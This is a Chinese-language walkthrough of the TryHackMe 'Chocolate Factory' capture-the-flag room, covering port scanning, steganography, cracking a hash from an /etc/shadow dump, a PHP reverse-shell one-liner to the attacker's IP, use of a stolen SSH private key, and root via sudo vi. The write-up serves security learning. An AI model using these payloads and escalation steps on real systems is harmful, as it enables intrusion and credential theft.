服务发现
┌──(rootkali)-[~/tryhackme/ChocolateFactory]└─# nmap -sV -Pn 10.10.164.40 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-29 22:47 EDTNmap scan report for 10.10.164.40Host is up (0.31s latency).Not shown: 65506 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))100/tcp open newacct?101/tcp open hostname?102/tcp open iso-tsap?103/tcp open gppitnp?104/tcp open acr-nema?105/tcp open csnet-ns?106/tcp open pop3pw?107/tcp open rtelnet?108/tcp open snagas?109/tcp open pop2?110/tcp open pop3?111/tcp open rpcbind?112/tcp open mcidas?113/tcp open ident?114/tcp open audionews?115/tcp open sftp?116/tcp open ansanotify?117/tcp open uucp-path?118/tcp open sqlserv?119/tcp open nntp?120/tcp open cfdptkt?121/tcp open erpc?122/tcp open smakynet?123/tcp open ntp?124/tcp open ansatrader?125/tcp open locus-map?9 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :目录爆破无发现
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.164.40 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-29_22-41-59.logTarget: http://10.10.164.40[22:41:59] Starting: [22:42:08] 200 - 1KB - / [22:47:23] 403 - 277B - /server-status Task Completedftp服务能够匿名登录,把外面的文件下载本地剖析
┌──(rootkali)-[~/tryhackme/ChocolateFactory]└─# ftp 10.10.164.40Connected to 10.10.164.40.220 (vsFTPd 3.0.3)Name (10.10.164.40:root): anonymous331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-rw-r-- 1 1000 1000 208838 Sep 30 2020 gum_room.jpg226 Directory send OK.ftp> get gum_room.jpglocal: gum_room.jpg remote: gum_room.jpg200 PORT command successful. Consider using PASV.150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes).226 Transfer complete.208838 bytes received in 3.45 secs (59.0388 kB/s)ftp> 用steghide拆散jpg里的文件,失去一个b64.txt,其实就是base64的密文
┌──(rootkali)-[~/tryhackme/ChocolateFactory]└─# steghide extract -sf gum_room.jpg Enter passphrase: wrote extracted data to "b64.txt". ┌──(rootkali)-[~/tryhackme/ChocolateFactory]└─# lsb64.txt gum_room.jpg ┌──(rootkali)-[~/tryhackme/ChocolateFactory]└─# cat b64.txt ZGFlbW9uOio6MTgzODA6MDo5OTk5OTo3Ojo6CmJpbjoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpzeXM6KjoxODM4MDowOjk5OTk5Ojc6OjoKc3luYzoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpnYW1lczoqOjE4MzgwOjA6OTk5OTk6Nzo6OgptYW46KjoxODM4MDowOjk5OTk5Ojc6OjoKbHA6KjoxODM4MDowOjk5OTk5Ojc6OjoKbWFpbDoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpuZXdzOio6MTgzODA6MDo5OTk5OTo3Ojo6CnV1Y3A6KjoxODM4MDowOjk5OTk5Ojc6OjoKcHJveHk6KjoxODM4MDowOjk5OTk5Ojc6OjoKd3d3LWRhdGE6KjoxODM4MDowOjk5OTk5Ojc6OjoKYmFja3VwOio6MTgzODA6MDo5OTk5OTo3Ojo6Cmxpc3Q6KjoxODM4MDowOjk5OTk5Ojc6OjoKaXJjOio6MTgzODA6MDo5OTk5OTo3Ojo6CmduYXRzOio6MTgzODA6MDo5OTk5OTo3Ojo6Cm5vYm9keToqOjE4MzgwOjA6OTk5OTk6Nzo6OgpzeXN0ZW1kLXRpbWVzeW5jOio6MTgzODA6MDo5OTk5OTo3Ojo6CnN5c3RlbWQtbmV0d29yazoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpzeXN0ZW1kLXJlc29sdmU6KjoxODM4MDowOjk5OTk5Ojc6OjoKX2FwdDoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpteXNxbDohOjE4MzgyOjA6OTk5OTk6Nzo6Ogp0c3M6KjoxODM4MjowOjk5OTk5Ojc6OjoKc2hlbGxpbmFib3g6KjoxODM4MjowOjk5OTk5Ojc6OjoKc3Ryb25nc3dhbjoqOjE4MzgyOjA6OTk5OTk6Nzo6OgpudHA6KjoxODM4MjowOjk5OTk5Ojc6OjoKbWVzc2FnZWJ1czoqOjE4MzgyOjA6OTk5OTk6Nzo6OgphcnB3YXRjaDohOjE4MzgyOjA6OTk5OTk6Nzo6OgpEZWJpYW4tZXhpbTohOjE4MzgyOjA6OTk5OTk6Nzo6Ogp1dWlkZDoqOjE4MzgyOjA6OTk5OTk6Nzo6OgpkZWJpYW4tdG9yOio6MTgzODI6MDo5OTk5OTo3Ojo6CnJlZHNvY2tzOiE6MTgzODI6MDo5OTk5OTo3Ojo6CmZyZWVyYWQ6KjoxODM4MjowOjk5OTk5Ojc6OjoKaW9kaW5lOio6MTgzODI6MDo5OTk5OTo3Ojo6CnRjcGR1bXA6KjoxODM4MjowOjk5OTk5Ojc6OjoKbWlyZWRvOio6MTgzODI6MDo5OTk5OTo3Ojo6CmRuc21hc3E6KjoxODM4MjowOjk5OTk5Ojc6OjoKcmVkaXM6KjoxODM4MjowOjk5OTk5Ojc6OjoKdXNibXV4Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnJ0a2l0Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnNzaGQ6KjoxODM4MjowOjk5OTk5Ojc6OjoKcG9zdGdyZXM6KjoxODM4MjowOjk5OTk5Ojc6OjoKYXZhaGk6KjoxODM4MjowOjk5OTk5Ojc6OjoKc3R1bm5lbDQ6IToxODM4MjowOjk5OTk5Ojc6OjoKc3NsaDohOjE4MzgyOjA6OTk5OTk6Nzo6OgpubS1vcGVudnBuOio6MTgzODI6MDo5OTk5OTo3Ojo6Cm5tLW9wZW5jb25uZWN0Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnB1bHNlOio6MTgzODI6MDo5OTk5OTo3Ojo6CnNhbmVkOio6MTgzODI6MDo5OTk5OTo3Ojo6CmluZXRzaW06KjoxODM4MjowOjk5OTk5Ojc6OjoKY29sb3JkOio6MTgzODI6MDo5OTk5OTo3Ojo6CmkycHN2YzoqOjE4MzgyOjA6OTk5OTk6Nzo6OgpkcmFkaXM6KjoxODM4MjowOjk5OTk5Ojc6OjoKYmVlZi14c3M6KjoxODM4MjowOjk5OTk5Ojc6OjoKZ2VvY2x1ZToqOjE4MzgyOjA6OTk5OTk6Nzo6OgpsaWdodGRtOio6MTgzODI6MDo5OTk5OTo3Ojo6CmtpbmctcGhpc2hlcjoqOjE4MzgyOjA6OTk5OTk6Nzo6OgpzeXN0ZW1kLWNvcmVkdW1wOiEhOjE4Mzk2Ojo6Ojo6Cl9ycGM6KjoxODQ1MTowOjk5OTk5Ojc6OjoKc3RhdGQ6KjoxODQ1MTowOjk5OTk5Ojc6OjoKX2d2bToqOjE4NDk2OjA6OTk5OTk6Nzo6OgpjaGFybGllOiQ2JENaSm5DUGVRV3A5L2pwTngka2hHbEZkSUNKbnI4UjNKQy9qVFIycjdEcmJGTHA4enE4NDY5ZDNjMC56dUtONHNlNjFGT2J3V0d4Y0hacU8yUkpIa2tMMWpqUFllZUd5SUpXRTgyWC86MTg1MzU6MDo5OTk5OTo3Ojo6Cg==解密进去是:
daemon:*:18380:0:99999:7:::bin:*:18380:0:99999:7:::sys:*:18380:0:99999:7:::sync:*:18380:0:99999:7:::games:*:18380:0:99999:7:::man:*:18380:0:99999:7:::lp:*:18380:0:99999:7:::mail:*:18380:0:99999:7:::news:*:18380:0:99999:7:::uucp:*:18380:0:99999:7:::proxy:*:18380:0:99999:7:::www-data:*:18380:0:99999:7:::backup:*:18380:0:99999:7:::list:*:18380:0:99999:7:::irc:*:18380:0:99999:7:::gnats:*:18380:0:99999:7:::nobody:*:18380:0:99999:7:::systemd-timesync:*:18380:0:99999:7:::systemd-network:*:18380:0:99999:7:::systemd-resolve:*:18380:0:99999:7:::_apt:*:18380:0:99999:7:::mysql:!:18382:0:99999:7:::tss:*:18382:0:99999:7:::shellinabox:*:18382:0:99999:7:::strongswan:*:18382:0:99999:7:::ntp:*:18382:0:99999:7:::messagebus:*:18382:0:99999:7:::arpwatch:!:18382:0:99999:7:::Debian-exim:!:18382:0:99999:7:::uuidd:*:18382:0:99999:7:::debian-tor:*:18382:0:99999:7:::redsocks:!:18382:0:99999:7:::freerad:*:18382:0:99999:7:::iodine:*:18382:0:99999:7:::tcpdump:*:18382:0:99999:7:::miredo:*:18382:0:99999:7:::dnsmasq:*:18382:0:99999:7:::redis:*:18382:0:99999:7:::usbmux:*:18382:0:99999:7:::rtkit:*:18382:0:99999:7:::sshd:*:18382:0:99999:7:::postgres:*:18382:0:99999:7:::avahi:*:18382:0:99999:7:::stunnel4:!:18382:0:99999:7:::sslh:!:18382:0:99999:7:::nm-openvpn:*:18382:0:99999:7:::nm-openconnect:*:18382:0:99999:7:::pulse:*:18382:0:99999:7:::saned:*:18382:0:99999:7:::inetsim:*:18382:0:99999:7:::colord:*:18382:0:99999:7:::i2psvc:*:18382:0:99999:7:::dradis:*:18382:0:99999:7:::beef-xss:*:18382:0:99999:7:::geoclue:*:18382:0:99999:7:::lightdm:*:18382:0:99999:7:::king-phisher:*:18382:0:99999:7:::systemd-coredump:!!:18396::::::_rpc:*:18451:0:99999:7:::statd:*:18451:0:99999:7:::_gvm:*:18496:0:99999:7:::charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::看上去是/etc/shadow里的文件内容
把charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/保留到hash.txt
用john去破解
┌──(rootkali)-[~/tryhackme/ChocolateFactory]└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])Cost 1 (iteration count) is 5000 for all loaded hashesWill run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statuscn7824 (charlie)1g 0:00:12:04 DONE (2021-09-29 23:29) 0.001379g/s 1358p/s 1358c/s 1358C/s cocker6..cn123Use the "--show" option to display all of the cracked passwords reliablySession completed取得凭证charlie:cn7824
认为是ssh明码,但其实不是。
关上http://10.10.164.40/,是一个登陆页面,用下面的凭证登录,会重定向到home.php
此页面有一个命令行输入框,能够执行linux命令
也就是从这里咱们能够取得一个反弹shell
应用上面payload取得反弹shell
php -r '$sock=fsockopen("10.13.21.169",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
在charlie家目录拿到id_rsa
$ cat user.txtcat: user.txt: Permission denied$ ls -alhtotal 40Kdrwxr-xr-x 5 charlie charley 4.0K Oct 7 2020 .drwxr-xr-x 3 root root 4.0K Oct 1 2020 ..-rw-r--r-- 1 charlie charley 3.7K Apr 4 2018 .bashrcdrwx------ 2 charlie charley 4.0K Sep 1 2020 .cachedrwx------ 3 charlie charley 4.0K Sep 1 2020 .gnupgdrwxrwxr-x 3 charlie charley 4.0K Sep 29 2020 .local-rw-r--r-- 1 charlie charley 807 Apr 4 2018 .profile-rw-r--r-- 1 charlie charley 1.7K Oct 6 2020 teleport-rw-r--r-- 1 charlie charley 407 Oct 6 2020 teleport.pub-rw-r----- 1 charlie charley 39 Oct 6 2020 user.txt$ cat teleport-----BEGIN RSA PRIVATE KEY-----MIIEowIBAAKCAQEA4adrPc3Uh98RYDrZ8CUBDgWLENUybF60lMk9YQOBDR+gpuRW1AzL12K35/Mi3Vwtp0NSwmlS7ha4y9sv2kPXv8lFOmLi1FV2hqlQPLw/unnEFwUbL4KBqBemIDefV5pxMmCqqguJXIkzklAIXNYhfxLr8cBS/HJoh/7qmLqrDoXNhwYjB3zgov7RUtk15Jv11D0Itsyr54pvYhCQgdoorU7l42EZJayIomHKon1jkofd1/oYfOBwgz6JOlNH1jFJoyIZg2OmEhnSjUltZ9mSzmQyv3M4AORQo3ZeLb+zbnSJycEERaObPlb0dRy3KoN79lt+dh+jSg/dM/TYYe5L4wIDAQABAoIBAD2TzjQDYyfgu4EjDi32Kx+Ea7qgMy5XebfQYquCpUjLhK+GSBt9knKoQb9OHgmCCgNG3+Klkzfdg3g9zAUn1kxDxFx2d6ex2rJMqdSpGkrsx5HwlsaUOoWATpkkFJt3TcSNlITquQVDe4tFw8JxvJpMs445CWxSXCwgaCxdZCiF33C0CtVw6zvOdF6MoOimVZf36UkXI2FmdZFlkR7MGsagAwRn1moCvQ7lNpYcqDDNf6jKnx5Sk83R5bVAAjV6ktZ9uEN8NItM/ppZj4PM6/IIPw2jQ8WzUoi/JG7aXJnBE4bm53qo2B4oVu3PihZ7tKkLZq3Oclrrkbn2EY0ndcECgYEA/29MMD3FEYcMCy+KQfEU2h9manqQmRMDDaBHkajq20KvGvnT1U/TRcbPNBaQMoSj6YrVhvgy3xtEdEHHBJO5qnq8TsLaSovQZxDifaGTaLaWgswc0biFuAKE2uKcpVCTSewbJyNewwTljhV9mMyn/piAtRlGXkzeyZ9/muZdtesCgYEA4idAKuEj2FE7M+MM/+ZeiZvLjKSNbiYYUPuDcsoWYxQCp0q8HmtjyAQizKo6DlXIPCCQRZSvmU1T3nk9MoTgDjkNO1xxbF2N7ihnBkHjOffod+zkNQbvzIDa4Q2owpeHZL19znQV98mrRaYDb5YsaEj0YoKfb8xhZJPyEb+v6+kCgYAZwE+vAVsvtCyrqARJN5PBla7Oh0Kym+8P3Zu5fI0Iw8VBc/Q+KgkDnNJgzvGElkisD7oNHFKMmYQiMEtvE7GBFVSMoCo/n67H5TTgM3zX7qhn0UoKfo7EiUR5iKUAKYpfxnTKUk+IW6ME2vfJgsBg82DuYPjuItPHAdRselLyNwKBgH77Rv5Ml9HYGoPR0vTEpwRhI/N+WaMlZLXj4zTK37MWAz9nqSTza31dRSTh1+NAq0OHjTpkeAx97L+YF5KMJToXMqTIDS+pgA3fRamvySQ9XJwpuSFFGdQb7co73ywT5QPdmgwYBlWxOKfMxVUcXybW/9FoQpmFipHsuBjbJq4xAoGBAIQnMPLpKqBk/ZV+HXmdJYSrf2MACWwL4pQO9bQUeta0rZA6iQwvLrkMQxg3lN2/1dnebKK5lEd2qFP1WLQUJqypo5TznXQ7tv0Uuw7o0cy5XNMFVwn/BqQmG2QwOAGbsQHcI0P19XgHTOB7Dm69rP9j1wIRBOF7iGfwhWdi+vln-----END RSA PRIVATE KEY-----把私钥保留成一个id_rsa文件,应用ssh登录charlie的账号,拿到user.txt
┌──(rootkali)-[~/tryhackme/ChocolateFactory]└─# ssh -i id_rsa charlie@10.10.164.40Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-115-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Sep 30 03:56:19 UTC 2021 System load: 0.08 Processes: 1206 Usage of /: 44.0% of 8.79GB Users logged in: 0 Memory usage: 49% IP address for eth0: 10.10.164.40 Swap usage: 0%0 packages can be updated.0 updates are security updates.The programs included with the Ubuntu system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted byapplicable law.The programs included with the Ubuntu system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted byapplicable law.Last login: Wed Oct 7 16:10:44 2020 from 10.0.2.5Could not chdir to home directory /home/charley: No such file or directoryTo run a command as administrator (user "root"), use "sudo <command>".See "man sudo_root" for details.charlie@chocolate-factory:/$ cat /home/charlie/user.txt flag{cd5509042371b34e4826e4838b522d2e}查看sudo -l,发现能够无明码应用vi命令
charlie@chocolate-factory:/$ sudo -lMatching Defaults entries for charlie on chocolate-factory: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser charlie may run the following commands on chocolate-factory: (ALL : !root) NOPASSWD: /usr/bin/vi用sudo vi -c ':!/bin/sh' /dev/null提权到root
charlie@chocolate-factory:/$ sudo vi -c ':!/bin/sh' /dev/null# iduid=0(root) gid=0(root) groups=0(root)# whoamiroot# cat /root/root.txtcat: /root/root.txt: No such file or directory然而root flag藏在一个叫root.py 的文件里,源码如下
from cryptography.fernet import Fernetimport pyfigletkey=input("Enter the key: ")f=Fernet(key)encrypted_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ'dcrypt_mess=f.decrypt(encrypted_mess)mess=dcrypt_mess.decode()display1=pyfiglet.figlet_format("You Are Now The Owner Of ")display2=pyfiglet.figlet_format("Chocolate Factory ")print(display1)print(display2)print(mess)这个脚本执行须要输出一个key,这个key我预计就是第一个问题里的答案
到处找,在/var/www/html里找到一个key_rev_key的文件,目录爆破的时候竟然没有爆进去。下载到本地剖析
用head查看文件头
└─# head key_rev_keyELF>�@�@8 @@@@�888�� hh/lib64/ld-linux-x86-64.so.2GNUGNU�s�ŗ5d�tz�~������ ▒0MF� � � � � � � 7"libc.so.6__isoc99_scanfputs__stack_chk_failprintf__cxa_finalizestrcmp__libc_start_mainGLIBC_2.7GLIBC_2.4GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableii]��f.�]�@f.�H�= H�5 UH)�H��H��H��H��?H�H��t▒H� H��t�����%b h������%Z h������%R h������%J h������%b f�1�I��^H��H���PTL�*H� ]��f�]�@f.��= u/H�= UH��t����H���� ]����fDUH��]�f���UH��H��@�}�H�u�dH�%(H�E�1�H�=)������H�E�H��H�=#������H�E�H�5H���l�����u5H�= s congratulations you have found the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' Keep its safeBad name!8���������� ���T���������L���,zRx ����+zRx $���`F▒J� �?▒;*3$"DH��\J����A�C注意有一行字:congratulations you have found the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
所以key是:b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
拿到root flag
# python root.pyEnter the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='__ __ _ _ _ _____ _ \ \ / /__ _ _ / \ _ __ ___ | \ | | _____ __ |_ _| |__ ___ \ V / _ \| | | | / _ \ | '__/ _ \ | \| |/ _ \ \ /\ / / | | | '_ \ / _ \ | | (_) | |_| | / ___ \| | | __/ | |\ | (_) \ V V / | | | | | | __/ |_|\___/ \__,_| /_/ \_\_| \___| |_| \_|\___/ \_/\_/ |_| |_| |_|\___| ___ ___ __ / _ \__ ___ __ ___ _ __ / _ \ / _| | | | \ \ /\ / / '_ \ / _ \ '__| | | | | |_ | |_| |\ V V /| | | | __/ | | |_| | _| \___/ \_/\_/ |_| |_|\___|_| \___/|_| ____ _ _ _ / ___| |__ ___ ___ ___ | | __ _| |_ ___ | | | '_ \ / _ \ / __/ _ \| |/ _` | __/ _ \| |___| | | | (_) | (_| (_) | | (_| | || __/ \____|_| |_|\___/ \___\___/|_|\__,_|\__\___| _____ _ | ___|_ _ ___| |_ ___ _ __ _ _ | |_ / _` |/ __| __/ _ \| '__| | | | | _| (_| | (__| || (_) | | | |_| | |_| \__,_|\___|\__\___/|_| \__, | |___/ flag{cec59161d338fef787fcb4e296b42124}#